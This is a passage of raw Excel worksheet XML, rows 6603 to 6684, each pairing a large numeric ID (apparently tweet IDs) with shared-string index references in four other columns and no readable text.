      </c>
      <c r="D6603" t="s">
        <v>16061</v>
      </c>
      <c r="E6603" t="s">
        <v>15824</v>
      </c>
    </row>
    <row r="6604" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6604">
        <v>1.2334220324964101E+18</v>
      </c>
      <c r="B6604" t="s">
        <v>16062</v>
      </c>
      <c r="C6604" t="s">
        <v>1</v>
      </c>
      <c r="D6604" t="s">
        <v>16063</v>
      </c>
      <c r="E6604" t="s">
        <v>16064</v>
      </c>
    </row>
    <row r="6605" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6605">
        <v>1.23342191465742E+18</v>
      </c>
      <c r="B6605" t="s">
        <v>16065</v>
      </c>
      <c r="C6605" t="s">
        <v>1</v>
      </c>
      <c r="D6605" t="s">
        <v>16066</v>
      </c>
      <c r="E6605" t="s">
        <v>16067</v>
      </c>
    </row>
    <row r="6606" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6606">
        <v>1.2334218556561999E+18</v>
      </c>
      <c r="B6606" t="s">
        <v>16068</v>
      </c>
      <c r="C6606" t="s">
        <v>1</v>
      </c>
      <c r="D6606" t="s">
        <v>16069</v>
      </c>
      <c r="E6606" t="s">
        <v>150</v>
      </c>
    </row>
    <row r="6607" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6607">
        <v>1.2334217671941499E+18</v>
      </c>
      <c r="B6607" t="s">
        <v>16070</v>
      </c>
      <c r="C6607" t="s">
        <v>1</v>
      </c>
      <c r="D6607" t="s">
        <v>16071</v>
      </c>
      <c r="E6607" t="s">
        <v>16072</v>
      </c>
    </row>
    <row r="6608" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6608">
        <v>1.2334217412439301E+18</v>
      </c>
      <c r="B6608" t="s">
        <v>16073</v>
      </c>
      <c r="C6608" t="s">
        <v>1</v>
      </c>
      <c r="D6608" t="s">
        <v>16074</v>
      </c>
      <c r="E6608" t="s">
        <v>1729</v>
      </c>
    </row>
    <row r="6609" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6609">
        <v>1.2334217229652301E+18</v>
      </c>
      <c r="B6609" t="s">
        <v>16075</v>
      </c>
      <c r="C6609" t="s">
        <v>1</v>
      </c>
      <c r="D6609" t="s">
        <v>16076</v>
      </c>
      <c r="E6609" t="s">
        <v>2331</v>
      </c>
    </row>
    <row r="6610" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6610">
        <v>1.2334216128645601E+18</v>
      </c>
      <c r="B6610" t="s">
        <v>16077</v>
      </c>
      <c r="C6610" t="s">
        <v>1</v>
      </c>
      <c r="D6610" t="s">
        <v>16078</v>
      </c>
      <c r="E6610" t="s">
        <v>16079</v>
      </c>
    </row>
    <row r="6611" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6611">
        <v>1.23342139474413E+18</v>
      </c>
      <c r="B6611" t="s">
        <v>16080</v>
      </c>
      <c r="C6611" t="s">
        <v>1</v>
      </c>
      <c r="D6611" t="s">
        <v>7111</v>
      </c>
      <c r="E6611" t="s">
        <v>384</v>
      </c>
    </row>
    <row r="6612" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6612">
        <v>1.2334213850971899E+18</v>
      </c>
      <c r="B6612" t="s">
        <v>16081</v>
      </c>
      <c r="C6612" t="s">
        <v>1</v>
      </c>
      <c r="D6612" t="s">
        <v>16082</v>
      </c>
      <c r="E6612" t="s">
        <v>2278</v>
      </c>
    </row>
    <row r="6613" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6613">
        <v>1.2334209094296399E+18</v>
      </c>
      <c r="B6613" t="s">
        <v>16083</v>
      </c>
      <c r="C6613" t="s">
        <v>1</v>
      </c>
      <c r="D6613" t="s">
        <v>16084</v>
      </c>
      <c r="E6613" t="s">
        <v>16085</v>
      </c>
    </row>
    <row r="6614" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6614">
        <v>1.2334204238466401E+18</v>
      </c>
      <c r="B6614" t="s">
        <v>16086</v>
      </c>
      <c r="C6614" t="s">
        <v>1</v>
      </c>
      <c r="D6614" t="s">
        <v>16087</v>
      </c>
      <c r="E6614" t="s">
        <v>16088</v>
      </c>
    </row>
    <row r="6615" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6615">
        <v>1.2334200871153001E+18</v>
      </c>
      <c r="B6615" t="s">
        <v>16089</v>
      </c>
      <c r="C6615" t="s">
        <v>1</v>
      </c>
      <c r="D6615" t="s">
        <v>16090</v>
      </c>
      <c r="E6615" t="s">
        <v>16091</v>
      </c>
    </row>
    <row r="6616" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6616">
        <v>1.2334200071216E+18</v>
      </c>
      <c r="B6616" t="s">
        <v>16092</v>
      </c>
      <c r="C6616" t="s">
        <v>1</v>
      </c>
      <c r="D6616" t="s">
        <v>16093</v>
      </c>
      <c r="E6616" t="s">
        <v>13197</v>
      </c>
    </row>
    <row r="6617" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6617">
        <v>1.2334189494061299E+18</v>
      </c>
      <c r="B6617" t="s">
        <v>16094</v>
      </c>
      <c r="C6617" t="s">
        <v>1</v>
      </c>
      <c r="D6617" t="s">
        <v>16095</v>
      </c>
      <c r="E6617" t="s">
        <v>16096</v>
      </c>
    </row>
    <row r="6618" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6618">
        <v>1.2334187449716101E+18</v>
      </c>
      <c r="B6618" t="s">
        <v>16097</v>
      </c>
      <c r="C6618" t="s">
        <v>1</v>
      </c>
      <c r="D6618" t="s">
        <v>16098</v>
      </c>
      <c r="E6618" t="s">
        <v>6685</v>
      </c>
    </row>
    <row r="6619" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6619">
        <v>1.23341869117549E+18</v>
      </c>
      <c r="B6619" t="s">
        <v>16099</v>
      </c>
      <c r="C6619" t="s">
        <v>1</v>
      </c>
      <c r="D6619" t="s">
        <v>16100</v>
      </c>
      <c r="E6619" t="s">
        <v>16101</v>
      </c>
    </row>
    <row r="6620" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6620">
        <v>1.2334186576461701E+18</v>
      </c>
      <c r="B6620" t="s">
        <v>16102</v>
      </c>
      <c r="C6620" t="s">
        <v>1</v>
      </c>
      <c r="D6620" t="s">
        <v>16103</v>
      </c>
      <c r="E6620" t="s">
        <v>390</v>
      </c>
    </row>
    <row r="6621" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6621">
        <v>1.2334186228460101E+18</v>
      </c>
      <c r="B6621" t="s">
        <v>16104</v>
      </c>
      <c r="C6621" t="s">
        <v>1</v>
      </c>
      <c r="D6621" t="s">
        <v>16105</v>
      </c>
      <c r="E6621" t="s">
        <v>16106</v>
      </c>
    </row>
    <row r="6622" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6622">
        <v>1.2334183728696801E+18</v>
      </c>
      <c r="B6622" t="s">
        <v>16107</v>
      </c>
      <c r="C6622" t="s">
        <v>1</v>
      </c>
      <c r="D6622" t="s">
        <v>16108</v>
      </c>
      <c r="E6622" t="s">
        <v>16109</v>
      </c>
    </row>
    <row r="6623" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6623">
        <v>1.23341808598768E+18</v>
      </c>
      <c r="B6623" t="s">
        <v>16110</v>
      </c>
      <c r="C6623" t="s">
        <v>1</v>
      </c>
      <c r="D6623" t="s">
        <v>16111</v>
      </c>
      <c r="E6623" t="s">
        <v>16112</v>
      </c>
    </row>
    <row r="6624" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6624">
        <v>1.2334179306474399E+18</v>
      </c>
      <c r="B6624" t="s">
        <v>16113</v>
      </c>
      <c r="C6624" t="s">
        <v>1</v>
      </c>
      <c r="D6624" t="s">
        <v>16114</v>
      </c>
      <c r="E6624" t="s">
        <v>230</v>
      </c>
    </row>
    <row r="6625" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6625">
        <v>1.2334171272746099E+18</v>
      </c>
      <c r="B6625" t="s">
        <v>16115</v>
      </c>
      <c r="C6625" t="s">
        <v>1</v>
      </c>
      <c r="D6625" t="s">
        <v>16116</v>
      </c>
      <c r="E6625" t="s">
        <v>2936</v>
      </c>
    </row>
    <row r="6626" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6626">
        <v>1.23341684098819E+18</v>
      </c>
      <c r="B6626" t="s">
        <v>16117</v>
      </c>
      <c r="C6626" t="s">
        <v>1</v>
      </c>
      <c r="D6626" t="s">
        <v>16118</v>
      </c>
      <c r="E6626" t="s">
        <v>16119</v>
      </c>
    </row>
    <row r="6627" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6627">
        <v>1.2334165129936599E+18</v>
      </c>
      <c r="B6627" t="s">
        <v>16120</v>
      </c>
      <c r="C6627" t="s">
        <v>1</v>
      </c>
      <c r="D6627" t="s">
        <v>16121</v>
      </c>
      <c r="E6627" t="s">
        <v>16122</v>
      </c>
    </row>
    <row r="6628" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6628">
        <v>1.23341650089729E+18</v>
      </c>
      <c r="B6628" t="s">
        <v>16123</v>
      </c>
      <c r="C6628" t="s">
        <v>1</v>
      </c>
      <c r="D6628" t="s">
        <v>16124</v>
      </c>
      <c r="E6628" t="s">
        <v>16125</v>
      </c>
    </row>
    <row r="6629" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6629">
        <v>1.2334164633709199E+18</v>
      </c>
      <c r="B6629" t="s">
        <v>16126</v>
      </c>
      <c r="C6629" t="s">
        <v>1</v>
      </c>
      <c r="D6629" t="s">
        <v>16127</v>
      </c>
      <c r="E6629" t="s">
        <v>30</v>
      </c>
    </row>
    <row r="6630" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6630">
        <v>1.2334164475163799E+18</v>
      </c>
      <c r="B6630" t="s">
        <v>16128</v>
      </c>
      <c r="C6630" t="s">
        <v>1</v>
      </c>
      <c r="D6630" t="s">
        <v>16129</v>
      </c>
      <c r="E6630" t="s">
        <v>16130</v>
      </c>
    </row>
    <row r="6631" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6631">
        <v>1.2334158952860001E+18</v>
      </c>
      <c r="B6631" t="s">
        <v>16131</v>
      </c>
      <c r="C6631" t="s">
        <v>1</v>
      </c>
      <c r="D6631" t="s">
        <v>16132</v>
      </c>
      <c r="E6631" t="s">
        <v>14240</v>
      </c>
    </row>
    <row r="6632" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6632">
        <v>1.2334153620094899E+18</v>
      </c>
      <c r="B6632" t="s">
        <v>16133</v>
      </c>
      <c r="C6632" t="s">
        <v>1</v>
      </c>
      <c r="D6632" t="s">
        <v>16134</v>
      </c>
      <c r="E6632" t="s">
        <v>1698</v>
      </c>
    </row>
    <row r="6633" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6633">
        <v>1.23341534443966E+18</v>
      </c>
      <c r="B6633" t="s">
        <v>16135</v>
      </c>
      <c r="C6633" t="s">
        <v>1</v>
      </c>
      <c r="D6633" t="s">
        <v>16136</v>
      </c>
      <c r="E6633" t="s">
        <v>15573</v>
      </c>
    </row>
    <row r="6634" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6634">
        <v>1.23341507652429E+18</v>
      </c>
      <c r="B6634" t="s">
        <v>16137</v>
      </c>
      <c r="C6634" t="s">
        <v>1</v>
      </c>
      <c r="D6634" t="s">
        <v>16138</v>
      </c>
      <c r="E6634" t="s">
        <v>16139</v>
      </c>
    </row>
    <row r="6635" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6635">
        <v>1.23341480248099E+18</v>
      </c>
      <c r="B6635" t="s">
        <v>16140</v>
      </c>
      <c r="C6635" t="s">
        <v>1</v>
      </c>
      <c r="D6635" t="s">
        <v>16141</v>
      </c>
      <c r="E6635" t="s">
        <v>7792</v>
      </c>
    </row>
    <row r="6636" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6636">
        <v>1.2334144656700001E+18</v>
      </c>
      <c r="B6636" t="s">
        <v>16142</v>
      </c>
      <c r="C6636" t="s">
        <v>1</v>
      </c>
      <c r="D6636" t="s">
        <v>16143</v>
      </c>
      <c r="E6636" t="s">
        <v>14252</v>
      </c>
    </row>
    <row r="6637" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6637">
        <v>1.23341425931858E+18</v>
      </c>
      <c r="B6637" t="s">
        <v>16144</v>
      </c>
      <c r="C6637" t="s">
        <v>1</v>
      </c>
      <c r="D6637" t="s">
        <v>16145</v>
      </c>
      <c r="E6637" t="s">
        <v>16146</v>
      </c>
    </row>
    <row r="6638" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6638">
        <v>1.23341421960701E+18</v>
      </c>
      <c r="B6638" t="s">
        <v>16147</v>
      </c>
      <c r="C6638" t="s">
        <v>1</v>
      </c>
      <c r="D6638" t="s">
        <v>16148</v>
      </c>
      <c r="E6638" t="s">
        <v>16149</v>
      </c>
    </row>
    <row r="6639" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6639">
        <v>1.23341418667747E+18</v>
      </c>
      <c r="B6639" t="s">
        <v>16150</v>
      </c>
      <c r="C6639" t="s">
        <v>1</v>
      </c>
      <c r="D6639" t="s">
        <v>16151</v>
      </c>
      <c r="E6639" t="s">
        <v>4313</v>
      </c>
    </row>
    <row r="6640" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6640">
        <v>1.2334141654334001E+18</v>
      </c>
      <c r="B6640" t="s">
        <v>16152</v>
      </c>
      <c r="C6640" t="s">
        <v>1</v>
      </c>
      <c r="D6640" t="s">
        <v>16153</v>
      </c>
      <c r="E6640" t="s">
        <v>16154</v>
      </c>
    </row>
    <row r="6641" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6641">
        <v>1.23341369411085E+18</v>
      </c>
      <c r="B6641" t="s">
        <v>16155</v>
      </c>
      <c r="C6641" t="s">
        <v>1</v>
      </c>
      <c r="D6641" t="s">
        <v>16156</v>
      </c>
      <c r="E6641" t="s">
        <v>5709</v>
      </c>
    </row>
    <row r="6642" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6642">
        <v>1.2334133237160599E+18</v>
      </c>
      <c r="B6642" t="s">
        <v>16157</v>
      </c>
      <c r="C6642" t="s">
        <v>1</v>
      </c>
      <c r="D6642" t="s">
        <v>16158</v>
      </c>
      <c r="E6642" t="s">
        <v>16159</v>
      </c>
    </row>
    <row r="6643" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6643">
        <v>1.2334133210904801E+18</v>
      </c>
      <c r="B6643" t="s">
        <v>16157</v>
      </c>
      <c r="C6643" t="s">
        <v>1</v>
      </c>
      <c r="D6643" t="s">
        <v>16160</v>
      </c>
      <c r="E6643" t="s">
        <v>16161</v>
      </c>
    </row>
    <row r="6644" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6644">
        <v>1.2334133198573299E+18</v>
      </c>
      <c r="B6644" t="s">
        <v>16162</v>
      </c>
      <c r="C6644" t="s">
        <v>1</v>
      </c>
      <c r="D6644" t="s">
        <v>16163</v>
      </c>
      <c r="E6644" t="s">
        <v>5682</v>
      </c>
    </row>
    <row r="6645" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6645">
        <v>1.23341331678704E+18</v>
      </c>
      <c r="B6645" t="s">
        <v>16162</v>
      </c>
      <c r="C6645" t="s">
        <v>1</v>
      </c>
      <c r="D6645" t="s">
        <v>16164</v>
      </c>
      <c r="E6645" t="s">
        <v>5057</v>
      </c>
    </row>
    <row r="6646" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6646">
        <v>1.2334133081635999E+18</v>
      </c>
      <c r="B6646" t="s">
        <v>16165</v>
      </c>
      <c r="C6646" t="s">
        <v>1</v>
      </c>
      <c r="D6646" t="s">
        <v>16166</v>
      </c>
      <c r="E6646" t="s">
        <v>16167</v>
      </c>
    </row>
    <row r="6647" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6647">
        <v>1.23341304269791E+18</v>
      </c>
      <c r="B6647" t="s">
        <v>16168</v>
      </c>
      <c r="C6647" t="s">
        <v>1</v>
      </c>
      <c r="D6647" t="s">
        <v>16169</v>
      </c>
      <c r="E6647" t="s">
        <v>16170</v>
      </c>
    </row>
    <row r="6648" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6648">
        <v>1.2334117099493701E+18</v>
      </c>
      <c r="B6648" t="s">
        <v>16171</v>
      </c>
      <c r="C6648" t="s">
        <v>1</v>
      </c>
      <c r="D6648" t="s">
        <v>16172</v>
      </c>
      <c r="E6648" t="s">
        <v>14266</v>
      </c>
    </row>
    <row r="6649" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6649">
        <v>1.23341154498319E+18</v>
      </c>
      <c r="B6649" t="s">
        <v>16173</v>
      </c>
      <c r="C6649" t="s">
        <v>1</v>
      </c>
      <c r="D6649" t="s">
        <v>2456</v>
      </c>
      <c r="E6649" t="s">
        <v>2102</v>
      </c>
    </row>
    <row r="6650" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6650">
        <v>1.2334112810818099E+18</v>
      </c>
      <c r="B6650" t="s">
        <v>16174</v>
      </c>
      <c r="C6650" t="s">
        <v>1</v>
      </c>
      <c r="D6650" t="s">
        <v>16175</v>
      </c>
      <c r="E6650" t="s">
        <v>1362</v>
      </c>
    </row>
    <row r="6651" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6651">
        <v>1.2334107853234701E+18</v>
      </c>
      <c r="B6651" t="s">
        <v>16176</v>
      </c>
      <c r="C6651" t="s">
        <v>1</v>
      </c>
      <c r="D6651" t="s">
        <v>16177</v>
      </c>
      <c r="E6651" t="s">
        <v>78</v>
      </c>
    </row>
    <row r="6652" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6652">
        <v>1.2334107642512499E+18</v>
      </c>
      <c r="B6652" t="s">
        <v>16178</v>
      </c>
      <c r="C6652" t="s">
        <v>1</v>
      </c>
      <c r="D6652" t="s">
        <v>16179</v>
      </c>
      <c r="E6652" t="s">
        <v>16180</v>
      </c>
    </row>
    <row r="6653" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6653">
        <v>1.2334101426009201E+18</v>
      </c>
      <c r="B6653" t="s">
        <v>16181</v>
      </c>
      <c r="C6653" t="s">
        <v>1</v>
      </c>
      <c r="D6653" t="s">
        <v>16182</v>
      </c>
      <c r="E6653" t="s">
        <v>16183</v>
      </c>
    </row>
    <row r="6654" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6654">
        <v>1.23340987326369E+18</v>
      </c>
      <c r="B6654" t="s">
        <v>16184</v>
      </c>
      <c r="C6654" t="s">
        <v>1</v>
      </c>
      <c r="D6654" t="s">
        <v>13229</v>
      </c>
      <c r="E6654" t="s">
        <v>13230</v>
      </c>
    </row>
    <row r="6655" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6655">
        <v>1.2334095815790999E+18</v>
      </c>
      <c r="B6655" t="s">
        <v>16185</v>
      </c>
      <c r="C6655" t="s">
        <v>1</v>
      </c>
      <c r="D6655" t="s">
        <v>16186</v>
      </c>
      <c r="E6655" t="s">
        <v>16187</v>
      </c>
    </row>
    <row r="6656" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6656">
        <v>1.2334095530367501E+18</v>
      </c>
      <c r="B6656" t="s">
        <v>16188</v>
      </c>
      <c r="C6656" t="s">
        <v>1</v>
      </c>
      <c r="D6656" t="s">
        <v>16189</v>
      </c>
      <c r="E6656" t="s">
        <v>14276</v>
      </c>
    </row>
    <row r="6657" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6657">
        <v>1.2334093319551401E+18</v>
      </c>
      <c r="B6657" t="s">
        <v>16190</v>
      </c>
      <c r="C6657" t="s">
        <v>1</v>
      </c>
      <c r="D6657" t="s">
        <v>16191</v>
      </c>
      <c r="E6657" t="s">
        <v>2278</v>
      </c>
    </row>
    <row r="6658" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6658">
        <v>1.2334090527529101E+18</v>
      </c>
      <c r="B6658" t="s">
        <v>16192</v>
      </c>
      <c r="C6658" t="s">
        <v>1</v>
      </c>
      <c r="D6658" t="s">
        <v>16193</v>
      </c>
      <c r="E6658" t="s">
        <v>460</v>
      </c>
    </row>
    <row r="6659" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6659">
        <v>1.2334088635730199E+18</v>
      </c>
      <c r="B6659" t="s">
        <v>16194</v>
      </c>
      <c r="C6659" t="s">
        <v>1</v>
      </c>
      <c r="D6659" t="s">
        <v>16195</v>
      </c>
      <c r="E6659" t="s">
        <v>7732</v>
      </c>
    </row>
    <row r="6660" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6660">
        <v>1.2334087520421701E+18</v>
      </c>
      <c r="B6660" t="s">
        <v>16196</v>
      </c>
      <c r="C6660" t="s">
        <v>1</v>
      </c>
      <c r="D6660" t="s">
        <v>16197</v>
      </c>
      <c r="E6660" t="s">
        <v>16198</v>
      </c>
    </row>
    <row r="6661" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6661">
        <v>1.2334082798138601E+18</v>
      </c>
      <c r="B6661" t="s">
        <v>16199</v>
      </c>
      <c r="C6661" t="s">
        <v>1</v>
      </c>
      <c r="D6661" t="s">
        <v>16200</v>
      </c>
      <c r="E6661" t="s">
        <v>13012</v>
      </c>
    </row>
    <row r="6662" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6662">
        <v>1.2334079775305101E+18</v>
      </c>
      <c r="B6662" t="s">
        <v>16201</v>
      </c>
      <c r="C6662" t="s">
        <v>1</v>
      </c>
      <c r="D6662" t="s">
        <v>16202</v>
      </c>
      <c r="E6662" t="s">
        <v>16203</v>
      </c>
    </row>
    <row r="6663" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6663">
        <v>1.23340793053328E+18</v>
      </c>
      <c r="B6663" t="s">
        <v>16204</v>
      </c>
      <c r="C6663" t="s">
        <v>1</v>
      </c>
      <c r="D6663" t="s">
        <v>16205</v>
      </c>
      <c r="E6663" t="s">
        <v>9865</v>
      </c>
    </row>
    <row r="6664" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6664">
        <v>1.23340771970671E+18</v>
      </c>
      <c r="B6664" t="s">
        <v>16206</v>
      </c>
      <c r="C6664" t="s">
        <v>1</v>
      </c>
      <c r="D6664" t="s">
        <v>16207</v>
      </c>
      <c r="E6664" t="s">
        <v>2542</v>
      </c>
    </row>
    <row r="6665" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6665">
        <v>1.233407612928E+18</v>
      </c>
      <c r="B6665" t="s">
        <v>16208</v>
      </c>
      <c r="C6665" t="s">
        <v>1</v>
      </c>
      <c r="D6665" t="s">
        <v>16209</v>
      </c>
      <c r="E6665" t="s">
        <v>1732</v>
      </c>
    </row>
    <row r="6666" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6666">
        <v>1.2334075086911501E+18</v>
      </c>
      <c r="B6666" t="s">
        <v>16210</v>
      </c>
      <c r="C6666" t="s">
        <v>1</v>
      </c>
      <c r="D6666" t="s">
        <v>16211</v>
      </c>
      <c r="E6666" t="s">
        <v>2536</v>
      </c>
    </row>
    <row r="6667" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6667">
        <v>1.2334069408453399E+18</v>
      </c>
      <c r="B6667" t="s">
        <v>16212</v>
      </c>
      <c r="C6667" t="s">
        <v>1</v>
      </c>
      <c r="D6667" t="s">
        <v>11188</v>
      </c>
      <c r="E6667" t="s">
        <v>6882</v>
      </c>
    </row>
    <row r="6668" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6668">
        <v>1.2334068923298401E+18</v>
      </c>
      <c r="B6668" t="s">
        <v>16213</v>
      </c>
      <c r="C6668" t="s">
        <v>1</v>
      </c>
      <c r="D6668" t="s">
        <v>16214</v>
      </c>
      <c r="E6668" t="s">
        <v>27</v>
      </c>
    </row>
    <row r="6669" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6669">
        <v>1.2334068747682801E+18</v>
      </c>
      <c r="B6669" t="s">
        <v>16215</v>
      </c>
      <c r="C6669" t="s">
        <v>1</v>
      </c>
      <c r="D6669" t="s">
        <v>16216</v>
      </c>
      <c r="E6669" t="s">
        <v>11467</v>
      </c>
    </row>
    <row r="6670" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6670">
        <v>1.2334068375858199E+18</v>
      </c>
      <c r="B6670" t="s">
        <v>16217</v>
      </c>
      <c r="C6670" t="s">
        <v>1</v>
      </c>
      <c r="D6670" t="s">
        <v>16218</v>
      </c>
      <c r="E6670" t="s">
        <v>1340</v>
      </c>
    </row>
    <row r="6671" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6671">
        <v>1.2334067964397299E+18</v>
      </c>
      <c r="B6671" t="s">
        <v>16219</v>
      </c>
      <c r="C6671" t="s">
        <v>1</v>
      </c>
      <c r="D6671" t="s">
        <v>16220</v>
      </c>
      <c r="E6671" t="s">
        <v>6261</v>
      </c>
    </row>
    <row r="6672" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6672">
        <v>1.23340678394063E+18</v>
      </c>
      <c r="B6672" t="s">
        <v>16221</v>
      </c>
      <c r="C6672" t="s">
        <v>1</v>
      </c>
      <c r="D6672" t="s">
        <v>16222</v>
      </c>
      <c r="E6672" t="s">
        <v>3659</v>
      </c>
    </row>
    <row r="6673" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6673">
        <v>1.2334067313357399E+18</v>
      </c>
      <c r="B6673" t="s">
        <v>16223</v>
      </c>
      <c r="C6673" t="s">
        <v>1</v>
      </c>
      <c r="D6673" t="s">
        <v>16224</v>
      </c>
      <c r="E6673" t="s">
        <v>5248</v>
      </c>
    </row>
    <row r="6674" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6674">
        <v>1.2334067239789199E+18</v>
      </c>
      <c r="B6674" t="s">
        <v>16225</v>
      </c>
      <c r="C6674" t="s">
        <v>1</v>
      </c>
      <c r="D6674" t="s">
        <v>16226</v>
      </c>
      <c r="E6674" t="s">
        <v>5049</v>
      </c>
    </row>
    <row r="6675" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6675">
        <v>1.23340651486349E+18</v>
      </c>
      <c r="B6675" t="s">
        <v>16227</v>
      </c>
      <c r="C6675" t="s">
        <v>1</v>
      </c>
      <c r="D6675" t="s">
        <v>16228</v>
      </c>
      <c r="E6675" t="s">
        <v>2498</v>
      </c>
    </row>
    <row r="6676" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6676">
        <v>1.2334065023600799E+18</v>
      </c>
      <c r="B6676" t="s">
        <v>16229</v>
      </c>
      <c r="C6676" t="s">
        <v>1</v>
      </c>
      <c r="D6676" t="s">
        <v>16230</v>
      </c>
      <c r="E6676" t="s">
        <v>2771</v>
      </c>
    </row>
    <row r="6677" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6677">
        <v>1.2334064782134999E+18</v>
      </c>
      <c r="B6677" t="s">
        <v>16231</v>
      </c>
      <c r="C6677" t="s">
        <v>1</v>
      </c>
      <c r="D6677" t="s">
        <v>16232</v>
      </c>
      <c r="E6677" t="s">
        <v>16233</v>
      </c>
    </row>
    <row r="6678" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6678">
        <v>1.23340638242819E+18</v>
      </c>
      <c r="B6678" t="s">
        <v>16234</v>
      </c>
      <c r="C6678" t="s">
        <v>1</v>
      </c>
      <c r="D6678" t="s">
        <v>16235</v>
      </c>
      <c r="E6678" t="s">
        <v>16236</v>
      </c>
    </row>
    <row r="6679" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6679">
        <v>1.23340629035074E+18</v>
      </c>
      <c r="B6679" t="s">
        <v>16237</v>
      </c>
      <c r="C6679" t="s">
        <v>1</v>
      </c>
      <c r="D6679" t="s">
        <v>16238</v>
      </c>
      <c r="E6679" t="s">
        <v>2278</v>
      </c>
    </row>
    <row r="6680" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6680">
        <v>1.2334058821190899E+18</v>
      </c>
      <c r="B6680" t="s">
        <v>16239</v>
      </c>
      <c r="C6680" t="s">
        <v>1</v>
      </c>
      <c r="D6680" t="s">
        <v>16240</v>
      </c>
      <c r="E6680" t="s">
        <v>16241</v>
      </c>
    </row>
    <row r="6681" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6681">
        <v>1.2334054592788101E+18</v>
      </c>
      <c r="B6681" t="s">
        <v>16242</v>
      </c>
      <c r="C6681" t="s">
        <v>1</v>
      </c>
      <c r="D6681" t="s">
        <v>16243</v>
      </c>
      <c r="E6681" t="s">
        <v>16244</v>
      </c>
    </row>
    <row r="6682" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6682">
        <v>1.23340525098958E+18</v>
      </c>
      <c r="B6682" t="s">
        <v>16245</v>
      </c>
      <c r="C6682" t="s">
        <v>1</v>
      </c>
      <c r="D6682" t="s">
        <v>16246</v>
      </c>
      <c r="E6682" t="s">
        <v>8460</v>
      </c>
    </row>
    <row r="6683" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6683">
        <v>1.2334050031104599E+18</v>
      </c>
      <c r="B6683" t="s">
        <v>16247</v>
      </c>
      <c r="C6683" t="s">
        <v>1</v>
      </c>
      <c r="D6683" t="s">
        <v>16248</v>
      </c>
      <c r="E6683" t="s">
        <v>16249</v>
      </c>
    </row>
    <row r="6684" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A6684">
        <v>1.23340499701602E+18</v>
      </c>
      <c r="B6684" t="s">
        <v>16250</v>
      </c>
      <c r="C6684" t="s">
        <v>1</v>
      </c>
      <c r="D6684" t="s">
        <v>16251</v>
      </c>
      <c r="E6684" t="s">
